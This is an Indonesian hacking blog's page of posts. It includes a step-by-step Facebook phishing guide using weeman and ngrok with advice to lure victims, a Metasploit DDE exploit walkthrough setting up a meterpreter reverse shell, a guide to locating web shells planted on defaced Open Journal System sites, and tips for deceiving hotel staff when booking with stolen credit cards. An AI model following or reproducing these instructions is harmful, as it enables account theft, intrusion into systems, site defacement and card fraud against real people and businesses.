News Ticker

Latest Posts

Cara Install WPSeku Di Termux

- Sunday, January 21, 2018 No Comments

Artikel ini saya repost dari Termux Tutorial . Buat kalian yang demen heking heking website tapi gapunya pc/laptop, kali ini dilakukan pada perangkat android . Melalui Aplikasi yg bernama termux . kalian bisa cari di playstore . lalu termux itu apa dan kegunaannya . Saya ambil sedikit kutipan dari official termux "Termux is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. A minimal base system is installed automatically - additional packages are available using the APT package manager"
Ngerti gak? gw gak ngerti anjir. translate aja dah sana wkwkwk .
Pada artikel ini saya akan menjelaskan tentang alat wpseku dan juga saya akan menunjukkan cara menginstal alat wpseku di termux menggunakan android. Alat ini juga bekerja pada perangkat aarch tapi wpscan tidak bekerja pada perangkat aarch.
WPSeku adalah pemindai kerentanan BlackBox WordPress yang bisa digunakan untuk memindai instalasi WordPress jarak jauh untuk menemukan masalah keamanan.
Install WPSeku Di Termux:
Pertama Anda Harus melakukan update dengan command berikut :
$ apt update && apt upgrade -y 
$ apt install git

Lalu ketik :
$ cd WpSeku
$ pkg install python2
$ pip2 install -r requirements.txt
$ python2 wpseku.py -t site.com

Cara Mengganti Header Terminal Mac OS X Menggunakan Figlet

- Saturday, January 13, 2018 No Comments

Cara Mengganti Header Terminal Mac OS X Menggunakan Figlet. Banyak sekali cara mengganti tampilan header terminal di Mac OS X. Misalnya, kita bisa menggunakan Figlet atau Cowsay atau yang lainnya. Kali ini kita bahas Cara Mengganti Header Terminal Mac OS X Menggunakan Figlet.

Baca Juga: Kumpulan Video Pembelajaran Pentesting Menggunakan Kali Linux

Figlet adalah sebuah program komputer yang menghasilkan teks spanduk, dalam berbagai tipografi, terdiri dari huruf-huruf terbuat dari kecil konglomerasi ASCII karakter (lihat ASCII art).Diantar kalian mungkin bosen dengan tampilan terminal yang hanya sebuah tempat hitam kosong.

Cara paling cepat untuk meng-install Figlet adalah menggunakan HomeBrew. Kalian bisa meng-install homebrew dengan perintah:

 ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)”

Setelah itu kalian install figlet, dengan mengetik perintah:

brew install figlet

Ketika Figlet sudah ter-install, kalian bisa melihat semua font yang tersedia di sana dengan mengetik perintah:

showfigfonts

Ketika kalian udah selesai memilih font, ketik kata yang kalian inginkan, disini saya contoh kan:

showfigfonts "Maxteroit"

Setelah itu, copy text ASCII yang kalian inginkan. Nah, untuk mengganti tampilan header terminal kalian, ketikkan perintah:

sudo pico /etc/motd

Paste text ASCII yang kalian copy tadi. Lalu tekan Control+O (Overwrite) untuk menyimpan. Lalu Control+X untuk keluar.

Buka terminal baru dan header kalian sudah berubah!

Kumpulan Video Pembelajaran Pentesting Menggunakan Kali Linux

- Wednesday, January 10, 2018 2 Comments

Kumpulan Video Pembelajaran Pentesting Menggunakan Kali Linux


Pentest Menggunakan Kali Linux

Hello, sudah lama tidak update yang berbau hacking, dan kali ini saya babang Maxter akan share
kumpulan video pembelajaran mengenai pentesting menggunakan KALI LINUX  ( OS heker jaman now) dan tools2 yg ada di Kali Linux itu sendiri.

Video pembelajaran ini berbahasa Inggris dan ukurannya pun lumayan besar, sekitar 691 MB-an,didalamnya ada 0-11 part, full video semua, dan pastinya dari orang yg hebat juga. 
Langsung saja.....

Berikut Screenshotnya






Yha itulah sedikit gambar pemanis yg ada di dalam File yg saya share ini.
Dan berikut Linknya : 


Sekian Postingan dari saya, jika ingin request video atau pdf lain atau mungkin request agar file diatas dibagi satu persatu agar sizenya terbagi bisa hubungi saya via email :

adittya@maxteroit.com

 Terima Kasih

Instagram Private Tools Di termux

- Tuesday, January 9, 2018 No Comments

Instagram Private Tools

Personal Tools to manage Instagram account (nodejs)
How to install
$ apt update && apt upgrade -y
$ apt install nodejs git
$ cd Instagram-Private-Tools
$ node index.js
$ git clone https://github.com/ccocot/Instagram-Private-Tools.git
$ npm install
List Tools :
  1. Unfollow not Followback
  2. Unfollow all Following
  3. Delete all media
  4. Follow Followers Target
  5. Bom Like Media Target
  6. Follow Account By Hastag
Thanks To CCOCOT For Making this tools
TERMUX TUTORIAL

Cara Hack Facebook Dengan Weeman dan Ngrok di TERMUX

- Tuesday, December 19, 2017 8 Comments

Cara Hack Facebook Dengan Weeman dan Ngrok

Banyak sekali cara hack facebook dari tahun ke tahun .
Dari mulai methode Bruteforce hingga phising . 
Keberhasilan hack facebook dengan cara membobol password
menggunakan Bruteforce sangat lah kecil . Ya semua tergantung
dari wordlist mu. Cara yang paling efektif ialah menggunakan 
tekhnik phising . Kita hanya perlu membuat sebuah url login page
yg telah di modifikasi de beri log . Tapi itu membutuhkan hosting
dan domain . Kali ini saya akan memberi cara membuat phising
dengan lebih mudah . Mudah bahan maksudnya wkwkw . walaupun
agak sedikit ribet pada prosesnya .
Langsung saja ikuti tahapnya .

Clone Tools weeman dengan command:
$ git clone https://github.com/evait-security/weeman.git
$ cd weeman
$ python2 weeman.py

Nah sekarang atur tools pada weeman . ikuti command berikut:
weeman > set url http://m.facebook.com
weeman > set action_url http://m.facebook.com/login.php

Jika target anda menggunakan desktop . ubah url menjadi http://facebook.com
dan action_url http://facebook.com/login.php

Semua sudah di set langsung jalankan dengan command:
weeman > run


Selanjutnya kita install ngrok dulu, daftar pada https://ngrok.com atau bisa juga
login menggunakan akun google dan github . 

Pilih download


Pilih Linux(ARM)



Buka session baru lalu masuk pada folder penyimpanan hasil download tadi dan ekstrak file zip ngrok :
$ cd storage/shared/Download
$ unzip ngrok-stable-linux-arm.zip
$ mv -v ngrok $HOME
$ cd
$ chmod +x ngrok
*NOTE : Nama partisi sdcard berbeda tiap jenis phonsel . jadi sesuaikan saja
kebanyakan bernama ~/sdcard . Jika kalian belum setting storage . setting dengan command :
$ termux-setup-storage
dan berikan ijin untuk mengakses sdcard


Lalu kita buka kembali website ngrok . dan copy authtoken nya dan paste:


$ ./ngrok authtoken TOKENMU

Lanjut :
$ ./ngrok http 8080

Akan muncul seperti ini : 

Copy forwardingnya :

Sebarkan atau pancing menggunakan tipu muslihat mu . kalo bahasa kerennya Social Engineering wkwkwkw .
Mari kita test, apakah ini berjala  atau tidak .
Pastekan url forwarder dari ngrok tadi 
Coba test login oleh mu . 

Nah mulai lah cari email/username dan passwordnya 


Ketemu kan XD . sekian tutorial Cara Hack Facebook Dengan Weeman Dan Ngrok di Termux . Gunakanlah dengan bijak

Cara Mencari Akses Shell Di CMS Open Journal System

- Tuesday, November 21, 2017 No Comments

    Cara Mencari Akses Shell Di CMS Open Journal System

        Mungkin banyak yg coba deface methode Open Journal System ini karna caranya lumayan cukup gampang , tapi banyak orang yg bermasalah pada saat mencari akses Sell / Script yg telah di upload.ya kali ini gw akan bahas tentang Cara Mencari Akses Shell Di CMS Open Journal System.

Yg pasti kalian udah tau atau mengerti cara deface Open Journa System bagi yg belum coba baca atau tanya ke mbah google , langsung aja ikutin step by step nya.

1.Setelah kalian pilih-pilih target , kalian jangan langsung register + tanam shell , Kalian periksa dahulu apakah direktori tempat shell kalian nanti ada atau kagak..

2.Cara cek nya simple, cukup tambahkan /files di belakang url target kalian contoh : http://target.co.li/files



                                                  (NOT VULN / TIDAK BISA DI TUSBOLD :V)
Kalau sering dapet yg kagak vuln mungkin itu evek ketampanan (faktor face) cuba ganti muka atau download yg baru...mungkin dg otak vokepers mu itu bisa mencari cara untuk mencari akses file nya.



                                                              (BISA VULN BISA TIDAK)

     Nah kalau yg kayak gini bisa vuln , bisa tidak .



                                                      (ITS VULN /DI TUSBOLD ENAK :V)


Yg kayak gini vuln , jngan lupa pastikan ada direktori Journalsnya biar di langkah selanjutnya gk bingung :v ok kita lanjutkan coly nya....

3.kalo udah vuln kayak gambar yg no 3 (kurang lebih , karna terkdang ada tampilan yg berbeda)

4.Setelah tanam shell berhasill, kalian balik lagi ke direktori files, kaya contoh di atas (gambar no.3), lalu kalian klik direktori journals -> (keluar angka-angka) pas di bagian di situ mungkin ada direktori angka yang lebih dari 1 -> ke direktori articles -> direktori id user kalian (angka, baca di tutrial deface ojs) -> lanjut ke direktori submission -> lanjut lagi ke direktori original -> nama file kalian.


Udah paham cok??kalau belum makanya jangan kebanyakan nonton vidio anu .....
sekian dulu totor gk guna kali ini , kalau masih bingung atau yg belum mengerti tutorial di atas bisa tanya-tanya ke SINI (awas orang ganteng  hati2 naksir) atau bisa juga ke SONO.

Spesial thanks to :"Kurniawan PS , Rival " "Garuda Security Hacker And Hacker Patah Hati Team .

Sekian salam jomblo.

Mengeksploitasi Celah 0day Microsoft DDE Vulnerability

- 4 Comments


Maxteroit - Akhir akhir ini telah ditemukan sebuah cara untuk memanfaatkan salah satu fitur yang ada pada Microsoft Windows untuk melakukan suspicous activity. Fitur itu tak lain ialah DDE, kabarnya pula fitur ini telah banyak disalahgunakan untuk menyebarkan malware dan ransomeware.

Sekilas Mengenai Microsoft DDE Vulnerability

DDE ( Dynamic Data Exchange ) merupakan salah satu fitur dalam Microsoft Office yang memungkinkan dua buah aplikasi untuk membagikan data yang sama. Sayangnya beberapa waktu lalu telah ditemukan cara memanfaatkan fitur tersebut untuk melakukan arbitary code execution. Salah satu keunggulan kelemahan ini adalah tak ada pop up warning , tak membutuhkan macros, dan tak memerlukan memory corruption.

Alat Tempur

Langkah-langkah

  • -         Download script dengan perintah

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
  • -         Simpan di

/usr/share/metasploit-framework/modules/exploits/windows/
  • -         Jalankan Metasploit
  • -         Jalankan perintah 

use exploits/windows/dde_delivery

  • -     Setting payload 

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.x.x

set LPORT 4444

  • -         Jalankan exploit
  • -         Copy script yang muncul pada module dan buka VirtualMachine kalian
  • -         Buka Microsoft Word
  • -         Klik tab Insert > Quick Parts > Fields > Ok


  •  -        Klik kanan pada kalimat yang muncul, pilih Toggle Field Code

  • -         Ganti dengan script yang kita dapat dari module


  • -         Save !
  • -         Buka file doc yang telah kita simpan tadi.
  • -         Syarat sah agar exploit ini bekerja adalah si korban harus mengklik yes pada 2 window yang keluar


  • -         Bila berhasil maka, Selamat !!! Kamu Baru Saja Mendapatkan Meterpreter Session!!!


Pencegahan

            Untuk mencegah serangan yang serupa maka kita bisa melakukan hal berikut :

Buka Office Button > Word Options > Advanced > uncheck Update Automatic Link at Opens.


Dan cara yang terampuh ialah jangan pernah membuka file mencurigakan apapun yang kalian dapat dari email maupun sumber lain.



Cc fisik dihotel

- Sunday, October 29, 2017 3 Comments

 Tips tentang hotel yang di mintain cc fisik? Oke saya disini mau berbagi Tips untuk anda


Oke.. Sekarang tukang ekse hotel pada ribut tentang dihotel yang dimintain cc fisik!!!
Lanjut saja dengan Tips nya....

Awal mula kalian ditanyakan cc fisik sama pelayan hotel anda jangan panik guys!!! Karna kepanikan bisa bikin pelayan hotel nambah curiga... Kalian Berbicara santai seperti sediakala!! Oke kita lanjut tahap-tahap nya :)

  1. Kamu bilang kepelayan hotel ketika ditanyakan cc fisik, kalo anda di pay kan oleh paman diluar negri(Sesuai country cc)
  2. Dan ketika ditanyakan kontak paman anda jawab tidak punya, hanya nomor telepon yang dimiliki, dan ketika ditanyain anda kasih nomor telepon fake dengan code sesuai country(Sebelum masuk hotel anda harus mengsiap kan nomor fake) lalu anda bilang ke pelayan hotel kalo paman susah dihubungi kadang bisa dihubungi malam hari karena Waktu beraktivitas berbeda... INGAT!!! Hp yang dipake untuk nomor fake harus dimatikan karna biasa nya dicoba telfon
  3. Ketika sudah berbincang-bincang dengan pelayan hotel karna nomor nya tidak aktif, anda tanyakan "Ini sudah bisa check in belum?" ketika pelayan bingung anda kasih tau "Wahh kalo gini saya bisa dilapor kan karna pelayanan kaya gini, sudah jelas-jelas pay online didengan bank luar negri" (Sambil ngancem dikit hehe) Kalo pelayan hotel jawab karena takut kriminal hack cc, anda jawab lagi "Coba aja malem mba telfon, saya cape mau istirahat"
  4. Jika anda malem hari ditanyakan kenapa tidak aktif? Anda jawab "kan sudah bilang susah dihubungi, malem juga jarang.. Btw bukan nya udah payment sukses full? Kok malah gini? Kalo udah sukses terus ga ada masalah dengan bank sama dengan kan bukan dapet HACK CC"

Ini Tips tidak tau sukses semua hotel atau tidak:v karna saya kemaren dikarawang sukses 100% jika gagal coba muka nya dipas kan dlu dikaca lemari anda :)


Oke sekian tips dari saya guys :) kalo tidak jelas maaf kan saya hehe..  Jika anda bingung silahkan tulis dikomentar atau Chat Fb Ded Ftu 

Cara Menemukan File Backdoor Di Suatu WEB

- Friday, September 22, 2017 6 Comments
lets say hello heters !!!
      Mlm semua,,udah lama hibernasi akhirnya bisa share seputar ilmu gaib di sini ea...maaf yak admin di sini jarang post di karnakan ada yg lagi patah hati,,jadi homo,,mulung dll.
   
     Ok langsung aja kali ini aink share cara Menemukan File Backdoor di suatu web,yah caranya mungkin udah basi tapi masih banyak admin web yg rada" geblek :v kagak tau wkwkw ya siapa tau tutor kali ini bisa membantu admin web menjadi admin yg gesit :v


Ikutin Langkahnya Tod !

  • Download dulu backdoor scanner di SINI (Pasword RAR {adithomo123}
  • Extract file rar nya terus upload file BackdoorScanner.php ke web yg ingin di scan lalu panngil file yg di upload tadi misalnya http://nekopoi.co.li/upload/backdoorscanner.php


                                               Kurang lebih seperti itulah penampakannya....

  • beri centang di semua kecuali yg terakhir




                                                         Penampakan Keduanya Gan


  • Dan Terakhir Klik START SCAN
                                                           Sekarang coba kita lihat hasilnya



Coba Lihat yg berwarna hijau..ada 4 Shell Backdoor :v Sadeees....sekarang coba kita lihat sheel yg telah terdeteksi.....
Ada Yg Upload Sheel Indo Exploit :v tinggal hapus dah file yg terdeteksi tadi done :v lanjut nge JAV


     Oke sekian tutor sampah kali ini moga" bisa berguna buat admin supaya menjadi admin yg gesit ..cepat tanggap :v

Kalo ada yg kurang jelas atau mau tanya" silahkan tanya di SINI Dan Jangan Lupa Like Fanspage Kami Di                                                                                        SONO













Cara Mencari Halaman Login Admin

- Thursday, September 21, 2017 No Comments
Gambar Hanya Pemanis.

Cara Mencari Halaman Login Admin

Sore gaes, lama juga gw ga nongol, hehe. Jadi pengen peluk kalian semua satu - satu, Unchh.
Kali ini gw balik dengan Tutorial Cara Mencari Halaman Login Admin.

Pernah gak kalian, abis maen SQLi misalnya, user/pass udah dapet, password udah berhasil di decrypt, tapi ganemu Halaman Login Admin? Sering. Nah, disini gw bawain beberapa cara nemuin halaman terkutuk itu :P

1. Havij.
Ya, Havij. Havij ini salah satu alat yang membantu penguji penetrasi untuk mencari dan mengeksploitasi kelemahan SQL Injection pada halaman web. Dan disana ada fitur admin finder nya loh.

Tutorial SQLi dengan Havij


2.  Admin Finder.
Di dunia ini, coba gw tanya, ada berapa tool adminfinder? Banyak :P Kalian bisa gunain salah satu dari mereka. Misal, dari sini. 

3. View Source.
Lahh? Kok View Source? 
Mungkin beberapa dari kalian belum tau ya :P Jadi kita intip2 source code web tadi.  
Lihat contoh ini,


 Disitu bisa kita lihat, sebelum dir uploaded_files , ada dir lagi dengan nama dashboard, kalian tau kan artinya? Wkwk.

4 . Intip Sampai ke Developernya.
Iya, cara ini emang gak umum banget, juga ini ada unsur - unsur factor face biasanya, wkwk.
Kebanyakan web, di bagian footer bakal ada nama developer dari web tadi. Nah, kita intip kesana, yuk gw tunjukin.
1. Target : http://mer99furniture.com/
2. Lihat ke pojok kanan bawah. Disitu tertulis Development by Mobista Technologies.
3. Dari web Mobista Technologies, kita intip - intip lagi. Dan gw nemu, di sini.
4. Kebetulan disana kita bisa lihat demo back-end dari web-web hasil karya Mobista Technologies. Dan salah satunya di sini.
5.Tinggal kita sama kan dengan target pertama, dan .. Gotcha! I got you! Halaman admin target berada di site/ew-admin. Persis seperti demo di web Mobista Technologies.

Mungkin cara terakhir agak rumit karena emang kita masuk banget sampe intip - intip ke web developer nya, hehe. But, Trust Me, it works.

Sekian postingan gw kali ini. Sampe Ketemu di postingan gw selanjutanya.